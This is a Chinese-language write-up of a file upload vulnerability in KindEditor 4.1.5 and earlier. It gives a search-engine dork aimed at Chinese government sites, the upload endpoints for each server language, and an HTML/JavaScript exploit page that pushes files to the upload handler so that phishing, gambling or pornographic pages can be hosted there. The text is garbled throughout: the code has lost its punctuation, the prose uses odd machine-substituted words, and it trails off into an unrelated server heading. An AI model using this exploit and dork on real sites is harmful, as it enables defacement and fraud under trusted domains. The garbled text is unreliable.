破绽等级:高危 Kindeditor是一套开源的HTML可视化编制器,主要用于让用户在网站上牟取所见即所得编制功效,兼容IE、Firefox、Chrome、Safari、Opera等主流阅读器。 破绽描述: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,,txt,zip,rar,gz,bz2,ps,pdf形式文件。支持 Java、NET、PHP、ASP等程序。 破绽应用: 通过搜索引擎找到目的,比如搜索关键字 inurlgovcnkindeditor 通过拜访xxgovcnkindeditorkindeditorjs,察看kindeditor版本是否含有破绽(=415) 牟取网站采用的开发语言,并确认kindeditor上传文件地址,各种语言上传地址如下: aspupload_jsonasp aspnetupload_jsonashx jspupload_jsonjsp phpupload_jsonphp 创造exploit页面,编制内容如下: 阅读器拜访页面功效如下: 抉择文件testtxt文件(文件内容:test…20190304),网站考查元素,察看返回结局,如图: 拜访网址结局如下: 破绽阴碍: 因为该破绽无法上传php,asp,java等类型文件,所以无法getshell,但是可以上传涵盖色情、赌博等类诱骗性网页,假如上传到政府类网站,不法分子会应用政府域名的威望性到达诱骗普通用户的目标,所以危害性很大。 解决设法: 限制上传文件类型
head
titlekindeditorexploittitle
scriptsrc=xxgovcnkindeditorkindeditorjsscript
script
KindEditorready(function(K){
varuploadbutton=Kuploadbutton({
buttonK(uploadButton)[0],
fieldNameimgFile,
urlxxgovcnkindeditoraspnetupload_jsonashx?dir=file,
afterUploadfunction(data){
if(dataerror===0){
varurl=KformatUrl(dataurl,absolute);
K(url)val(url);
}
},
});
uploadbuttonfileBoxchange(function(e){
uploadbuttonsubmit();
});
});
script
head
body
divclass=upload
inputtype=button=uploadButtonvalue=Upload
div
body
网站渗透富文本编辑器kindeditor415文件上传漏洞:金蝶云星空服务器
金蝶云星空服务器描述::